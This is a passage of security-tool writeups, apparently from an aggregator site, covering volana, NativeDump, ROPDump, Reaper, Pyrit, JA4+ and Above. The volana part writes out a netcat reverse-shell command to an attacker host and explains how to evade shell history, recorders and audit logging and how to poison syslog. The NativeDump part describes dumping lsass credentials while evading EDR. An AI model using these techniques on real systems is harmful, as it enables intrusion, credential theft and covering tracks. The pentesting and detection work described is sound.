        ## (Here a nc bindshell to obtain a interactive shell)
        volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
        >>> ENCRYPTED COMMAND

        Copy encrypted command and executed it with your rce on target machine

        ./volana decr [encrypted_command]
        ## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

        Why not just hide command with echo [command] | base64 ? And decode on target with echo [encoded_command] | base64 -d | bash

        Because we want to be protected against systems that trigger alert for base64 use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.

        Detection

        Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

        By detected we mean if we are able to trigger an alert if a certain command has been executed.

        Hide from

        Only the volana launching command line will be catched. 🧠 However, by adding a space before executing it, the default bash behavior is to not save it

        • Detection systems that are based on history command output
        • Detection systems that are based on history files
        • .bash_history, ".zsh_history" etc ..
        • Detection systems that are based on bash debug traps
        • Detection systems that are based on sudo built-in logging system
        • Detection systems tracing all processes syscall system-wide (eg opensnoop)
        • Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
        • Easy to detect & avoid: pkill -9 script
        • Not a common case
        • screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
        • Command detection Could be avoid with volana with encryption

        Visible for

        • Detection systems that have alert for unknown command (volana one)
        • Detection systems that are based on keylogger
        • Easy to avoid: copy/past commands
        • Not a common case
        • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
        • Only for sudo or su commands
        • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
        • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
        • Difficult to analyze, could be make unreadable by making several diversion syscalls
        • Custom LD_PRELOAD injection to make log
        • Not a common case at all

        Bug bounty

        Sorry for the clickbait title, but no money will be provided for contibutors. πŸ›

        Let me know if you have found: * a way to detect volana * a way to spy console that don't detect volana commands * a way to avoid a detection system

        Report here

        Credit



        NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

        By: Unknown


        NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).


        • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
        • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
        • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
        • NtOpenProcess to get a handle for the lsass process
        • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

        Usage:

        NativeDump.exe [DUMP_FILE]

        The default file name is "proc_.dmp":

        The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

        Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

        The project has three branches at the moment (apart from the main branch with the basic technique):

        • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

        • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

        • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


        Technique in detail: Creating a minimal Minidump file

        After reading Minidump undocumented structures, its structure can be summed up to:

        • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
        • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
        • Streams: Every stream contains different information related to the process and has its own format
        • Regions: The actual bytes from the process from each memory region which can be read

        I created a parsing tool which can be helpful: MinidumpParser.

        We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


        A. Header

        The header is a 32-bytes structure which can be defined in C# as:

        public struct MinidumpHeader
        {
        public uint Signature;
        public ushort Version;
        public ushort ImplementationVersion;
        public ushort NumberOfStreams;
        public uint StreamDirectoryRva;
        public uint CheckSum;
        public IntPtr TimeDateStamp;
        }

        The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header


        B. Stream Directory

        Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:

        public struct MinidumpStreamDirectoryEntry
        {
        public uint StreamType;
        public uint Size;
        public uint Location;
        }

        The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

        ID Stream Type
        0x00 UnusedStream
        0x01 ReservedStream0
        0x02 ReservedStream1
        0x03 ThreadListStream
        0x04 ModuleListStream
        0x05 MemoryListStream
        0x06 ExceptionStream
        0x07 SystemInfoStream
        0x08 ThreadExListStream
        0x09 Memory64ListStream
        0x0A CommentStreamA
        0x0B CommentStreamW
        0x0C HandleDataStream
        0x0D FunctionTableStream
        0x0E UnloadedModuleListStream
        0x0F MiscInfoStream
        0x10 MemoryInfoListStream
        0x11 ThreadInfoListStream
        0x12 HandleOperationListStream
        0x13 TokenStream
        0x16 HandleOperationListStream

        C. SystemInformation Stream

        First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

        public struct SystemInformationStream
        {
        public ushort ProcessorArchitecture;
        public ushort ProcessorLevel;
        public ushort ProcessorRevision;
        public byte NumberOfProcessors;
        public byte ProductType;
        public uint MajorVersion;
        public uint MinorVersion;
        public uint BuildNumber;
        public uint PlatformId;
        public uint UnknownField1;
        public uint UnknownField2;
        public IntPtr ProcessorFeatures;
        public IntPtr ProcessorFeatures2;
        public uint UnknownField3;
        public ushort UnknownField14;
        public byte UnknownField15;
        }

        The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


        D. ModuleList Stream

        Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

        The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

        public struct ModuleListStream
        {
        public uint NumberOfModules;
        public ModuleInfo[] Modules;
        }

        As there is only one, it gets simplified to:

        public struct ModuleListStream
        {
        public uint NumberOfModules;
        public IntPtr BaseAddress;
        public uint Size;
        public uint UnknownField1;
        public uint Timestamp;
        public uint PointerName;
        public IntPtr UnknownField2;
        public IntPtr UnknownField3;
        public IntPtr UnknownField4;
        public IntPtr UnknownField5;
        public IntPtr UnknownField6;
        public IntPtr UnknownField7;
        public IntPtr UnknownField8;
        public IntPtr UnknownField9;
        public IntPtr UnknownField10;
        public IntPtr UnknownField11;
        }

        The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


        E. Memory64List Stream

        Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.

        public struct Memory64ListStream
        {
        public ulong NumberOfEntries;
        public uint MemoryRegionsBaseAddress;
        public Memory64Info[] MemoryInfoEntries;
        }

        Each module entry is a 16-bytes structure:

        public struct Memory64Info
        {
        public IntPtr Address;
        public IntPtr Size;
        }

        The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them


        F. Looping memory regions

        There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:

        1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
        2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
        3. Open a process handle. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

        With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream


        G. Creating Minidump file

        After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




        ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

        By: Zion3R


        ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


        Features

        • Identifies potential ROP gadgets in binary executables.
        • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
        • Generates exploit templates to make the exploit process faster
        • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
        • Can print function names and addresses for further analysis.
        • Supports searching for specific instruction patterns.

        Usage

        • <binary>: Path to the binary file for analysis.
        • -s, --search SEARCH: Optional. Search for specific instruction patterns.
        • -f, --functions: Optional. Print function names and addresses.

        Examples

        • Analyze a binary without searching for specific instructions:

        python3 ropdump.py /path/to/binary

        • Analyze a binary and search for specific instructions:

        python3 ropdump.py /path/to/binary -s "pop eax"

        • Analyze a binary and print function names and addresses:

        python3 ropdump.py /path/to/binary -f



        Reaper - Proof Of Concept On BYOVD Attack

        By: Zion3R


        Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

        Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

        Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.


        Features

        • Kill process
        • Suspend process

        Help

              ____
        / __ \___ ____ _____ ___ _____
        / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
        / _, _/ __/ /_/ / /_/ / __/ /
        /_/ |_|\___/\__,_/ .___/\___/_/
        /_/

        [Coded by MrEmpy]
        [v1.0]

        Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
        Options:
        sp, suspend process
        kp, kill process

        Values:
        PROCESSID process id to suspend/kill

        Examples:
        Reaper.exe sp 1337
        Reaper.exe kp 1337

        Demonstration

        Install

        You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

        Note: The executable and driver must be in the same directory.



        Pyrit - The Famous WPA Precomputed Cracker

        By: Zion3R


        Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

        WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


        The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

        Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

        Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

        These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

        • A single storage (e.g. a MySQL-server)
        • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
        • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

        What's new

        • Fixed #479 and #481
        • Pyrit CUDA now compiles in OSX with Toolkit 7.5
        • Added use_CUDA and use_OpenCL in config file
        • Improved cores listing and managing
        • limit_ncpus now disables all CPUs when set to value <= 0
        • Improve CCMP packet identification, thanks to yannayl

        See CHANGELOG file for a better description.

        How to use

        Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

        How to participate

        You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



        JA4+ - Suite Of Network Fingerprinting Standards

        By: Zion3R


        JA4+ is a suite of network FingerprintingΒ methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

        Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
        JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
        JA4T: TCP Fingerprinting (JA4T/TS/TScan)


        To understand how to read JA4+ fingerprints, see Technical Details

        This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.

        JA4/JA4+ support is being added to:
        GreyNoise
        Hunt
        Driftnet
        DarkSail
        Arkime
        GoLang (JA4X)
        Suricata
        Wireshark
        Zeek
        nzyme
        Netresec's CapLoader
        NetworkMiner">Netresec's NetworkMiner
        NGINX
        F5 BIG-IP
        nfdump
        ntop's ntopng
        ntop's nDPI
        Team Cymru
        NetQuest
        Censys
        Exploit.org's Netryx
        cloudflare.com/bots/concepts/ja3-ja4-fingerprint/">Cloudflare
        fastly
        with more to be announced...

        Examples

        Application JA4+ Fingerprints
        Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
        JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
        JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
        JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
        IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
        IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
        JA4S=t120300_c030_5e2616a54c73
        Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
        JA4S=t130200_1301_a56c5b993250
        JA4X=000000000000_4f24da86fad6_bf0f0589fc03
        JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
        Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
        JA4X=2166164053c1_2166164053c1_30d204a01551
        SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
        JA4S=t130200_1302_a56c5b993250
        JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
        Qakbot JA4X=2bab15409345_af684594efb4_000000000000
        Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
        Darkgate JA4H=po10nn060000_cdb958d032b0
        LummaC2 JA4H=po11nn050000_d253db9d024b
        Evilginx JA4=t13d191000_9dc949149365_e7c285222651
        Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
        Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
        Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

        For more, see ja4plus-mapping.csv
        The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

        Plugins

        Wireshark
        Zeek
        Arkime

        Binaries

        Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

        Download the latest JA4 binaries from: Releases.

        JA4+ on Ubuntu

        sudo apt install tshark
        ./ja4 [options] [pcap]

        JA4+ on Mac

        1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH

        ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
        ./ja4 [options] [pcap]

        JA4+ on Windows

        1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
        tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
        2) Add the location of tshark to your "PATH" environment variable in Windows.
        (System properties > Environment Variables... > Edit Path)
        3) Open cmd, navigate the ja4 folder

        ja4 [options] [pcap]

        Database

        An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

        In the meantime, see ja4plus-mapping.csv

        Feel free to do a pull request with any JA4+ data you find.

        JA4+ Details

        JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

        All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

        For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).

        Current methods and implementation details:
        | Full Name | Short Name | Description | |---|---|---| | JA4 | JA4 | TLS Client Fingerprinting
        | JA4Server | JA4S | TLS Server Response / Session Fingerprinting | JA4HTTP | JA4H | HTTP Client Fingerprinting | JA4Latency | JA4L | Latency Measurment / Light Distance | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting | JA4SSH | JA4SSH | SSH Traffic Fingerprinting | JA4TCP | JA4T | TCP Client Fingerprinting | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner

        The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

        To understand how to read JA4+ fingerprints, see Technical Details

        Licensing

        JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

        JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

        All JA4+ methods are patent pending.
        JA4+ is a trademark of FoxIO

        JA4+ can and is being implemented into open source tools, see the License FAQ for details.

        This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

        ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

        Q&A

        Q: Why are you sorting the ciphers? Doesn't the ordering matter?
        A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

        Q: Why are you sorting the extensions?
        A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

        So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

        Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
        A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

        JA4+ was created by:

        John Althouse, with feedback from:

        Josh Atkins
        Jeff Atkinson
        Joshua Alexander
        W.
        Joe Martin
        Ben Higgins
        Andrew Morris
        Chris Ueland
        Ben Schofield
        Matthias Vallentin
        Valeriy Vorotyntsev
        Timothy Noel
        Gary Lipsky
        And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

        Contact John Althouse at john@foxio.io for licensing and questions.

        Copyright (c) 2024, FoxIO



        Above - Invisible Network Protocol Sniffer

        By: Zion3R


        Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


        Above: Invisible network protocol sniffer
        Designed for pentesters and security engineers

        Author: Magama Bazarov, <caster@exploit.org>
        Pseudonym: Caster
        Version: 2.6
        Codename: Introvert

        Disclaimer

        All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

        It is a specialized network security tool that helps both pentesters and security professionals.

        Mechanics

        Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

        Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

        Supported protocols

        Detects up to 27 protocols:

        MACSec (802.1X AE)
        EAPOL (Checking 802.1X versions)
        ARP (Passive ARP, Host Discovery)
        CDP (Cisco Discovery Protocol)
        DTP (Dynamic Trunking Protocol)
        LLDP (Link Layer Discovery Protocol)
        802.1Q Tags (VLAN)
        S7COMM (Siemens)
        OMRON
        TACACS+ (Terminal Access Controller Access Control System Plus)
        ModbusTCP
        STP (Spanning Tree Protocol)
        OSPF (Open Shortest Path First)
        EIGRP (Enhanced Interior Gateway Routing Protocol)
        BGP (Border Gateway Protocol)
        VRRP (Virtual Router Redundancy Protocol)
        HSRP (Host Standby Redundancy Protocol)
        GLBP (Gateway Load Balancing Protocol)
        IGMP (Internet Group Management Protocol)
        LLMNR (Link Local Multicast Name Resolution)
        NBT-NS (NetBIOS Name Service)
        MDNS (Multicast DNS)
        DHCP (Dynamic Host Configuration Protocol)
        DHCPv6 (Dynamic Host Configuration Protocol v6)
        ICMPv6 (Internet Control Message Protocol v6)
        SSDP (Simple Service Discovery Protocol)
        MNDP (MikroTik Neighbor Discovery Protocol)

        Operating Mechanism

        Above works in two modes:

        • Hot mode: Sniffing on your interface specifying a timer
        • Cold mode: Analyzing traffic dumps

        The tool is very simple in its operation and is driven by arguments:

        • Interface: Specifying the network interface on which sniffing will be performed
        • Timer: Time during which traffic analysis will be performed
        • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
        • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
        • Passive ARP: Detecting hosts in a segment using Passive ARP
        usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

        options:
        -h, --help show this help message and exit
        --interface INTERFACE
        Interface for traffic listening
        --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
        --output OUTPUT File name where the traffic will be recorded
        --input INPUT File name of the traffic dump
        --passive-arp Passive ARP (Host Discovery)

        Information about protocols

        The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

        When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

        • Impact: What kind of attack can be performed on this protocol;

        • Tools: What tool can be used to launch an attack;

        • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

        • Mitigation: Recommendations for fixing the security problems

        • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


        Installation

        Linux

        You can install Above directly from the Kali Linux repositories

        caster@kali:~$ sudo apt update && sudo apt install above

        Or...

        caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
        caster@kali:~$ git clone https://github.com/casterbyte/Above
        caster@kali:~$ cd Above/
        caster@kali:~/Above$ sudo python3 setup.py install

        macOS:

        # Install python3 first
        brew install python3
        # Then install required dependencies
        sudo pip3 install scapy colorama setuptools

        # Clone the repo
        git clone https://github.com/casterbyte/Above
        cd Above/
        sudo python3 setup.py install

        Don't forget to deactivate your firewall on macOS!

        Settings > Network > Firewall


        How to Use

        Hot mode

        Above requires root access for sniffing

        Above can be run with or without a timer:

        caster@kali:~$ sudo above --interface eth0 --timer 120

        To stop traffic sniffing, press CTRL + Π‘

        WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

        Example:

        caster@kali:~$ sudo above --interface eth0 --timer 120

        -----------------------------------------------------------------------------------------
        [+] Start sniffing...

        [*] After the protocol is detected - all necessary information about it will be displayed
        --------------------------------------------------
        [+] Detected SSDP Packet
        [*] Attack Impact: Potential for UPnP Device Exploitation
        [*] Tools: evil-ssdp
        [*] SSDP Source IP: 192.168.0.251
        [*] SSDP Source MAC: 02:10:de:64:f2:34
        [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
        --------------------------------------------------
        [+] Detected MDNS Packet
        [*] Attack Impact: MDNS Spoofing, Credentials Interception
        [*] Tools: Responder
        [*] MDNS Spoofing works specifically against Windows machines
        [*] You cannot get NetNTLMv2-SSP from Apple devices
        [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
        [*] MDNS Speaker MAC: 02:10:de:64:f2:34
        [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
        --------------------------------------------------

        If you need to record the sniffed traffic, use the --output argument

        caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

        If you interrupt the tool with CTRL+C, the traffic is still written to the file

        Cold mode

        If you already have some recorded traffic, you can use the --input argument to look for potential security issues

        caster@kali:~$ above --input ospf-md5.cap

        Example:

        caster@kali:~$ sudo above --input ospf-md5.cap

        [+] Analyzing pcap file...

        --------------------------------------------------
        [+] Detected OSPF Packet
        [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
        [*] Tools: Loki, Scapy, FRRouting
        [*] OSPF Area ID: 0.0.0.0
        [*] OSPF Neighbor IP: 10.0.0.1
        [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
        [!] Authentication: MD5
        [*] Tools for bruteforce: Ettercap, John the Ripper
        [*] OSPF Key ID: 1
        [*] Mitigation: Enable passive interfaces, use authentication
        --------------------------------------------------
        [+] Detected OSPF Packet
        [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
        [*] Tools: Loki, Scapy, FRRouting
        [*] OSPF Area ID: 0.0.0.0
        [*] OSPF Neighbor IP: 192.168.0.2
        [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
        [!] Authentication: MD5
        [*] Tools for bruteforce: Ettercap, John the Ripper
        [*] OSPF Key ID: 1
        [*] Mitigation: Enable passive interfaces, use authentication

        Passive ARP

        The tool can detect hosts without noise in the air by processing ARP frames in passive mode

        caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

        [+] Host discovery using Passive ARP

        --------------------------------------------------
        [+] Detected ARP Reply
        [*] ARP Reply for IP: 192.168.1.88
        [*] MAC Address: 00:00:0c:07:ac:c8
        --------------------------------------------------
        [+] Detected ARP Reply
        [*] ARP Reply for IP: 192.168.1.40
